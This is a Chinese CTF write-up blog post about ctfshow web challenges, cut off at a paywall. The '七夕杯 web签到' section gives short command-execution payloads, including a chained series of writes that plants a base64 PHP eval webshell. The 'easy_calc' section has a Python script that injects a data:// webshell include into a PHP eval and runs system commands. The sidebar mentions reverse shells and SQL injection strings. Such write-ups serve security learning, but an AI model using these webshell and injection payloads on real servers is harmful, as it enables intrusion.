ctfshow web学习记录

原创 已于 2022-10-15 13:48:22 修改 · 2.9k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #php #开发语言 #大数据

于 2022-09-25 10:40:41 首次发布
本文分享了作者在多个CTF比赛中的Web挑战经验,包括利用命令执行漏洞、SQL注入、文件包含等技巧破解挑战的过程,并提供了详细的解题思路。

我们要学习且不断努力,在ctfshow我又学习到了很多东西,弥补了自己不少基础

目录

七夕杯-web

1.web签到

第一种解法:

​编辑

第二种解法:

2.easy_calc

3.easy_cmd

4.easy_sql

_萌新

web1-8

web9-21

获得百分之百的快乐

萌新赛签到题

WEB AK赛 签到_观己

1024_WEB签到

月饼杯||

web签到

新春欢乐赛

热身

web1 这里面的链接的链接值得学习

单身杯

web签到

摆烂杯

一行代码

36D练手赛

不知所措.jpg

七夕杯-web

1.web签到

这个我是看别人的wp,第一次遇到这种有点懵,仅支持较短命令执行,且不会回显。
通过测试我们可以知道他只能运行7位以内及7位的命令,还是挺短的

第一种解法:

参考:yu22x的博客

通过将命令写进文件中,访问得到命令运行的内容

ls />a

运行后,去访问http://url/api/a得到a文件,查看得到命令运行的内容

 从这里我们就看到的了flag,但是因为长度限制的问题,我们就要运用linux系统的通配符

cat /*>a 
这是我们正常思维执行,通过cat命令来读取/目录下所有文件,但是这一串的长度已经大于7了
有没有刚好小一位的呢,有,就是nl
正好我们进行扩展一下,当cat命令不能使用,我们还能使用tac、more、nl之类的
以及还能使用通配符列如cat命令是在/usr/bin/cat这里
我们就能使用/???/???/c?t这样之类的来充cat使用

最终payload为

nl /*>a

第二种解法:

这个我就不详细讲了可以参考CTF长度限制命令执行

payload为

>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

 这个相当于执行0这个文件,0这个文件按照命令,将一个木马写进了,1.php里面

就是命令执行的思路

2.easy_calc

现将代码都截取下来

<?php


if(check($code)){

    eval('$result='."$code".";");
    echo($result);    
}

function check(&$code){

    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];

    if(!isset($num1) || !isset($num2) || !isset($symbol) ){
        
        return false;
    }

    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){
        return false;
    }

    if(preg_match("/^[\+\-\*\/]$/", $symbol)){
        $code = "$num1$symbol$num2";
        return true;
    }

    return false;
}

分析一下,用POST的方式传进去三个参数分别为num1,sysmbo1,num2

preg_match函数进行匹配,三个参数的内容里面必须有/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/  中最少一个符号否则就输出false

匹配sysmbo1中,必须有+ / * - 之一,之后将三个参数和在一块,eval()运行

这让我想起了data的伪协议,正好没有被过滤,真的有这么巧吗

我们尝试一下

写一个脚本,方便修改尝试

额,忘记说明了,这三个参数都是calc.php的,大家通过抓包的时候就可以知道

我是这样写的

import requests

s = requests.Session()
url = "http://df917a09-dfd8-4022-9fab-27489fccbdf5.challenge.ctf.show/calc.php"

data = {
    'num1': 'include "data:/',
    'symbol': '/',
    'num2': 'text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsnMSddKTs/Pg"'
}

url2=url+'?1=system("ls");'
a = s.post(url2, data=data).text
print(a)

得到了,这三个文件
calc.php
index.php
jquery.min.js

看来没有我们的flag

看看根目录

 有这么一些东西,也是没有直接显示我们的flag

但是吧,怎么就突然多了一个secret目录我很好奇,ls看一下

最低0.47元/天 解锁文章
ctfshow七夕杯web
m0_68074153的博客
08-06 2338
限制长度命令执行,php伪协议,反弹shell
最新CTFShow web1-7——CTF秀WEB模块解题思路_ctfshow web题目解析
2401_84264727的博客
05-04 1480
这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到 flag。
ctfshow web入门SQL注入 web250--web253
2301_81040377的博客
05-05 423
【代码】ctfshow web入门SQL注入 web250--web253。
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 5729
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
CTFshow_Web——【nl】难了
Ho1aAs‘s Blog
03-17 1314
文章目录知识点解题思路完 知识点 Linux读取文件指令 星号通配符 文件名作为指令执行 解题思路 先审计代码 猜测是RCE读取当前php,要求指令长度小于4 要小于4,只能用nl读取 Linux中可以将文件名作为函数和参数,通过星号通配执行 先新建一个名称是nl的文件作为指令 ?1=>nl 将右尖括号左侧的内容写入右侧文件,因此相当于新建了一个叫nl的空文件 接着读取当前的php,我们预期是执行nl xxx.php,这里由于不知道这个php的名称,无法执行 ?1=*>z 这里的操作是
ctfshow web 【nl】难了 wp
arcuied
12-07 383
ctfshow web 【nl】难了 wp
[ctfshow web入门] web12 信息收集与弱密码
最新发布
qq_50332504的博客
04-07 363
摘要:本文记录了一个网站渗透测试过程。首先通过目录扫描发现/admin路径,尝试常用弱密码失败后,从网站公开信息中找到疑似密码的电话号码"372619038",成功登录后台。测试过程中注意到状态码401提示需认证访问,并提供了相关学习资源和后续题目链接。文章展现了一个典型的弱密码利用案例,同时指出管理员将敏感信息公开显示的安全隐患。
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1428
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
CTFShow web1-7——CTF秀WEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1957
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
ctfshow-web【七夕杯】
记录学习,一起进步
05-10 518
ctfshow-web【七夕杯】
CTFSHOW七夕杯web
羽的博客
08-05 2225
CTFSHOW 七夕杯web
ctfshow 七夕杯
quan9i的博客
08-13 559
只能执行较短命令,不能回显,这个时候考虑到写入内容涉及到重定向符这里的话我们可以用ls命令查看根目录,然后把他定向到一个自定义文件中ls / > a此时我们去访问api/a发现在根目录下,我们直接用flag的话又因为字符串长度过长而无法执行,这里的话我们直接用*,用nl命令来读nl /*>b。...
ctfshow七夕杯web签到wp
arcuied
12-29 424
ctfshow七夕杯web签到wp
cftshow 七夕杯 web部分WP
绮洛Ki1ro的博客
08-06 1159
别人七夕陪情侣,我在七夕死做题。。。。好吧,先不想别的了,这次七夕杯web前三题还算简单都做出来了,最后一题是关于java sql注入的,java还没学得很好,就没做了,看了群主的直播感觉还是很有难度的,难怪无一人解出。......
CTFShow2021七月赛Web
feng的博客
07-10 1180
CTFShow2021七月赛Web warmup $ext = pathinfo($_GET['file'], PATHINFO_EXTENSION); if($ext==='php'){ include $_GET['file']; } 要求文件后缀为php,经过测试可以远程文件包含。VPS上写个php马直接包含即可。 ?file=http://118.31.168.198:39543/feng.php 0=phpinfo(); 存在disable_functi
ctfshow 七夕杯(复现)
as you know, nlp is fantasitc!
08-07 2007
最终执行命令的语句是 $num1$symbol$num2 拼接起来的,而且过滤()不能调用函数,所以根据语言结构是 include、require、echo这种语句,试着去包含文件。这个题可以理解为注入,在整个计算语句中注入我们想要执行的命令语句,只不过是过滤()之后不能调用函数执行。我开始这样做了,但是最后并没有做出来的原因是:我一直在网站根目录下看有没有生成文件,实际上这条命令执行在api这个目录下,生成的文件也在这个目录下,所以需要到/api这个目录下去寻找是否生成文件。,尝试别的地方,发现。...
ctfshow[七夕杯]sweetheart
weixin_51055545的博客
08-06 701
限制了申请数量(10个)和申请的大小(0x400),将申请的堆指针放在heap_list + 3 * i 的地址里,程序会在申请一个0x10大小的堆块,用来存放名字,也就是堆块的index,这里读取字符用的是自己写的一个函数readn(),​ 下班回到酒店看到ctfshow七夕杯的比赛,就来玩一玩,只有一道pwn,dreamcat师傅出的2.27的一道堆题,题目还是很有趣的,题目结合真实情景,疯狂星期四v我50!bk(),show()都是常规的释放操作和显示操作,重点看new_one()和buy()函数,.
ctfshow 36D练手赛 超超超级详解 ==
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
09-30 1807
1、不知所措.jpg 这题对我这个新手来说真的是一言难尽…太吃经验了,老手肯定是分分钟解决 打开页面,这里的意思是变量$file必须要有test 首先猜测变量$file是通过$_GET['file']GET请求得到的且为?file=test ??自动给我加了一个php 难道是存在一个test.php文件?尝试,输入test自动补php,index.php?file=test.php,这是一个文件包含? 也确实存在,貌似是文件包含,但是它说flag不在这儿 既然是文件包含,尝试用php:
ctfshow web121
03-27
### CTFShow Web121 题目解题思路 CTFShow 平台上的 Web 类型题目通常涉及常见的安全漏洞利用以及防御技巧的学习。对于 Web121 这道题目,虽然具体描述未提供,但从以往的经验来看,这类题目可能涉及到 SQL 注入、文件上传漏洞、命令执行或其他常见攻击向量。 以下是基于已有经验推测的解题方向: #### 可能的安全漏洞分析 Web121 的设计可能是围绕 `intval()` 函数展开的逻辑验证问题[^2]。`intval()` 是 PHP 中用于强制类型转换的一个函数,在处理输入数据时可能会引入安全隐患。例如: - 如果程序依赖于 `intval()` 来过滤用户输入并假设其安全性,则可能存在绕过机制。 - 用户可以通过构造特定参数来触发预期之外的行为。 #### 测试方法与工具 为了找到潜在漏洞,可以尝试以下几种方式: 1. **SQL Injection**: 使用单引号 `'` 或其他特殊字符测试是否存在注入点。 ```sql ' OR '1'='1 -- ``` 2. **Type Juggling**: 利用 PHP 的弱类型特性,通过传递不同形式的数据(如字符串中的数字部分),观察返回结果的变化。 ```php intval('1abc'); // 输出 1 ``` 3. **Boundary Testing**: 对边界条件进行探索,比如最小值 `-PHP_INT_MAX`, 最大值 `PHP_INT_MAX`. 4. **Error-Based Debugging**: 查看错误消息是否泄露敏感信息或者帮助定位问题所在位置. #### 实际操作建议 当面对类似情况时, 应该遵循如下原则: - 尝试多种payload组合以覆盖更多可能性. - 记录每次请求及其响应以便后续分析对比差异之处. ```python import requests url = "http://ctfshow.com/web121" for i in range(-10, 10): payload = f"?id={i}" r = requests.get(url + payload) print(r.text[:50]) # 打印前五十个字符查看变化 ``` 上述脚本展示了如何自动化发送GET请求给目标URL,并附带不同的ID参数值来进行批量试探。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值